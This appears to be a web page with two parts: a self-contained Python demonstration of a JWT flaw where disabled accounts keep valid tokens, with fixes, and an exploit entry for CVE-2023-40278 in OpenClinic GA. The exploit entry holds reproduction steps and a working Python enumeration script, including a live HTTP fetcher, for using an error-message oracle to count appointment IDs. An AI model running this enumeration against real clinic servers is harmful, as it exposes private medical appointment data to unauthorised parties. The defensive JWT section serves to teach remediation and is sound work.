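The behaviour above, reduced to a self-contained example that runs without Django (added for this page; it is not code from the advisory or from djangorestframework-simplejwt): a stdlib-only HS256 issuer and verifier stand in for `AccessToken.for_user()` and `verify()`, next to the two checks that close the gap, refusing to mint a token for an inactive account and re-loading the user at authentication time. The `User` class, the signing key and the user table are constructed; the claim names mirror the ones simplejwt uses (`user_id`, `token_type`, `exp`) but the encoding is this example's own.

```python
import base64
import hashlib
import hmac
import json
import time
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class User:
    """Constructed stand-in for django.contrib.auth's User (only the fields the example needs)."""
    id: int
    username: str
    is_active: bool = True


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _sign(signing_input: bytes, key: bytes) -> bytes:
    return hmac.new(key, signing_input, hashlib.sha256).digest()


def issue_token(user: User, key: bytes, ttl: int = 300, now: Optional[int] = None) -> str:
    """Mint an HS256 access token. Like AccessToken.for_user(), this looks only at user.id,
    never at user.is_active, so a disabled account still receives a valid token."""
    now = int(time.time()) if now is None else now
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    claims = {"user_id": user.id, "token_type": "access", "iat": now, "exp": now + ttl}
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signature = _b64url(_sign(f"{header}.{payload}".encode(), key))
    return f"{header}.{payload}.{signature}"


def verify_token(token: str, key: bytes, now: Optional[int] = None) -> dict:
    """Token-level checks only, the equivalent of AccessToken(...).verify(): signature,
    expiry and token type. Nothing here consults the user record."""
    header, payload, signature = token.split(".")
    if not hmac.compare_digest(_sign(f"{header}.{payload}".encode(), key), _b64url_decode(signature)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload))
    now = int(time.time()) if now is None else now
    if claims.get("token_type") != "access":
        raise ValueError("wrong token type")
    if claims["exp"] <= now:
        raise ValueError("token expired")
    return claims


def issue_token_checked(user: User, key: bytes, **kwargs) -> str:
    """Hardened issuance: never mint a token for a disabled account."""
    if not user.is_active:
        raise PermissionError("user is inactive")
    return issue_token(user, key, **kwargs)


def authenticate(token: str, key: bytes, users: Dict[int, User], now: Optional[int] = None) -> User:
    """Hardened authentication: once the token checks out, re-load the user from the user
    store and reject disabled accounts. A signed token cannot know the account was disabled
    after it was issued, so this check has to live in the request-authentication layer."""
    claims = verify_token(token, key, now=now)
    user = users.get(claims["user_id"])
    if user is None:
        raise PermissionError("user not found")
    if not user.is_active:
        raise PermissionError("user is inactive")
    return user


def demo() -> dict:
    """Token issued while the account is active, account disabled afterwards."""
    key = b"constructed-signing-key"  # constructed for the example; never hard-code a real key
    alice = User(id=5, username="alice")
    users = {alice.id: alice}
    token = issue_token(alice, key, now=1_700_000_000)
    results = {"verify_while_active": verify_token(token, key, now=1_700_000_001)["user_id"]}

    alice.is_active = False  # account disabled after the token was issued
    # The token itself is still cryptographically valid...
    results["verify_after_disable"] = verify_token(token, key, now=1_700_000_001)["user_id"]
    # ...so only an authentication layer that re-checks the user can stop it.
    try:
        authenticate(token, key, users, now=1_700_000_001)
        results["auth_after_disable"] = "allowed"
    except PermissionError as exc:
        results["auth_after_disable"] = str(exc)
    # And hardened issuance refuses to mint a fresh token for the disabled account.
    try:
        issue_token_checked(alice, key, now=1_700_000_001)
        results["issue_after_disable"] = "allowed"
    except PermissionError as exc:
        results["issue_after_disable"] = str(exc)
    return results


if __name__ == "__main__":
    print(demo())
```

The second check matters more than the first: even with issuance fixed, every token minted before an account was disabled stays valid until it expires, so either the authentication layer re-reads `is_active` on each request or access-token lifetimes have to be short enough that the window is acceptable.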
-
OpenClinic GA 5.247.01 - Information Disclosure
# Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure
# Date: 2023-08-14
# Exploit Author: VB
# Vendor Homepage: https://sourceforge.net/projects/open-clinic/
# Software Link: https://sourceforge.net/projects/open-clinic/
# Version: OpenClinic GA 5.247.01
# Tested on: Windows 10, Windows 11
# CVE: CVE-2023-40278

# Details
An information disclosure vulnerability exists in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The component returns different error messages depending on the value of the AppointmentUid parameter, so the error text acts as an oracle that lets an attacker deduce whether an appointment with a given ID exists.

# Proof of Concept (POC)
Steps to Reproduce:
- Access the vulnerable component:
  - Navigate to the URL: http://[IP]:10088/openclinic/planning/printAppointmentPdf.jsp?AppointmentUid=1.1
- Manipulate the AppointmentUid parameter:
  - Change the `AppointmentUid` parameter value to test different IDs.
  - For example, try different numerical values or formats.
- Observe the responses:
  - Note the system's response for each `AppointmentUid` value.
  - A "document is not open" error indicates that an appointment with the specified ID exists.
  - A different error message or response indicates that it does not.
- Confirm the vulnerability:
  - The error message differing with the existence of an appointment confirms the information disclosure.
  - An unauthorized user can thus determine whether specific appointments exist without any access to the appointment data itself. In aggregate, an attacker could deduce the number of appointments performed by private clinics, surgeries and private doctors.
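The enumeration the steps above describe, as an added example (written for this page; not the advisory's own code or anything from OpenClinic). It turns the error-message oracle into a classifier: a baseline response is taken first for an ID that cannot exist, and every probed ID is then labelled "exists" when the "document is not open" marker appears, "absent" when the response is identical to the baseline, and "unknown" otherwise, so a block page or an unrelated error is never counted as a hit. The endpoint path, parameter name and marker text come from the advisory; the "<prefix>.<n>" ID shape is inferred from the example value 1.1 and is an assumption, and the fake server, its error strings and the existing IDs are constructed so the example runs offline.

```python
import re
from collections import Counter
from typing import Callable, Dict, Iterable, Tuple

Response = Tuple[int, str]           # (HTTP status code, response body)
Fetcher = Callable[[str], Response]  # maps an AppointmentUid value to the server's response

# Error text the advisory reports for an existing appointment.
EXISTS_MARKER = "document is not open"


def classify(resp: Response, baseline: Response) -> str:
    """Label one response: 'exists' if it carries the marker, 'absent' if it is identical to the
    baseline (the response for an ID that cannot exist), otherwise 'unknown', which means a
    different error, a block page or similar that deserves a look rather than a guess."""
    status, body = resp
    if EXISTS_MARKER in body.lower():
        return "exists"
    if (status, body) == baseline:
        return "absent"
    return "unknown"


def enumerate_ids(fetch: Fetcher, uids: Iterable[str], baseline_uid: str = "999999.999999") -> Dict[str, str]:
    """Take the baseline first, then probe each uid through `fetch` and label it."""
    baseline = fetch(baseline_uid)
    if EXISTS_MARKER in baseline[1].lower():
        raise ValueError("baseline id matched the 'exists' signature; choose another baseline")
    return {uid: classify(fetch(uid), baseline) for uid in uids}


def candidate_uids(prefix: int, start: int, stop: int) -> Iterable[str]:
    """IDs in the '<prefix>.<n>' shape of the advisory's example (1.1). Assumption: the two
    numbers are independent counters; the advisory does not say what they encode."""
    return (f"{prefix}.{n}" for n in range(start, stop))


def summarize(results: Dict[str, str]) -> Counter:
    return Counter(results.values())


# --- constructed stand-in for a vulnerable instance (no network involved) ---------------
FAKE_EXISTING = {"1.1", "1.2", "3.1"}  # constructed: IDs the fake server treats as existing


def fake_fetch(uid: str) -> Response:
    """Constructed responses shaped like the behaviour the advisory describes."""
    if not re.fullmatch(r"\d+\.\d+", uid):
        return 500, "Error: invalid AppointmentUid"        # constructed: malformed input
    if uid in FAKE_EXISTING:
        return 500, "Error: The document is not open."     # constructed: carries the marker
    return 500, "Error: appointment lookup failed"         # constructed: unknown ID


def http_fetch_factory(base_url: str, timeout: float = 10.0) -> Fetcher:
    """Fetcher for a live target, using the URL shape from the advisory; needs `requests`."""
    import requests  # imported here so the offline demo has no third-party dependency

    def fetch(uid: str) -> Response:
        r = requests.get(f"{base_url}/openclinic/planning/printAppointmentPdf.jsp",
                         params={"AppointmentUid": uid}, timeout=timeout)
        return r.status_code, r.text

    return fetch


if __name__ == "__main__":
    results = enumerate_ids(fake_fetch, list(candidate_uids(1, 1, 4)) + ["3.1", "abc"])
    for uid, label in results.items():
        print(f"{uid:>8}: {label}")
    print(summarize(results))
```

Against a real instance, swap `fake_fetch` for `http_fetch_factory("http://[IP]:10088")`; the baseline comparison is what keeps the count honest, since any response that is neither the marker nor the exact known-absent response is reported as unknown instead of being silently folded into either bucket.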